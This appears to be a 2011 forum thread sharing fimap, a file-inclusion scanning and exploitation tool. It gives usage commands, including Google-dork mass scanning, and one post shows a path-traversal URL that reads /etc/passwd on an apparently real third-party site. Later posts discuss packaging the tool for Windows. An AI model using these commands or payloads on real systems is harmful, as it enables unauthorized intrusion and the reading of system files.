x3uz Posted May 7, 2011 Report Posted May 7, 2011 for my first post, I shared a very useful tool for RFI / LFI Examples: 1. Scan a single URL for FI errors: ./fimap.py -u 'http://localhost/test.php?file=bang&id=23' 2. Scan a list of URLS for FI errors: ./fimap.py -m -l '/tmp/urllist.txt' 3. Scan Google search results for FI errors: ./fimap.py -g -q 'inurl:include.php' 4. Harvest all links of a webpage with recurse level of 3 and write the URLs to /tmp/urllist ./fimap.py -H -u 'http://localhost' -d 3 -w /tmp/urllistfimap - A little tool for local and remote file inclusion auditing and exploitation. - Google Project Hosting Quote
Birkoff Posted May 7, 2011 Report Posted May 7, 2011 tre sa ai piton instalat ca sa mearga ala... poate cineva care se pricepe face un executabil care sa mearga independent... Quote
x3uz Posted May 7, 2011 Author Report Posted May 7, 2011 can be! Personally, I'm under linux and python is installed base but this a very good tool ! Quote
x3uz Posted May 7, 2011 Author Report Posted May 7, 2011 small exemple of result LFI scan : http://vladru.tk/1/include.php?url=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd Quote
Birkoff Posted May 7, 2011 Report Posted May 7, 2011 can be! Personally, I'm under linux and python is installed base but this a very good tool ! I realized this, but since i do not work in python, but in other languages, ??would be useful to ad a binary version for Windows. That's why i specified. So good anyway, i'm curious to what the final version will be implemented. If you have a compiler and i do know how to compile program, that many from here can hardly wait. Quote
blech Posted May 7, 2011 Report Posted May 7, 2011 @x3uz do not doublepost@Birkoff l-am facut eu pt windows dar la teste cand dau un simplu scan de genu fimap.exe -g -q 'argumen' imi da eroarea: "generic.xml file not found! This file is very important!" si nu stiu cum sa-l import sau unde sa-l pun.precizez ca sunt noob si ca am creat versiunea pentru windows cu py2exemai exact:python install.py py2exeunde install.py continefrom distutils.core import setupimport py2exesetup(console=['fimap.py'])iar fisirele fimap au fost puse in root unde au fost executate si comenzile Quote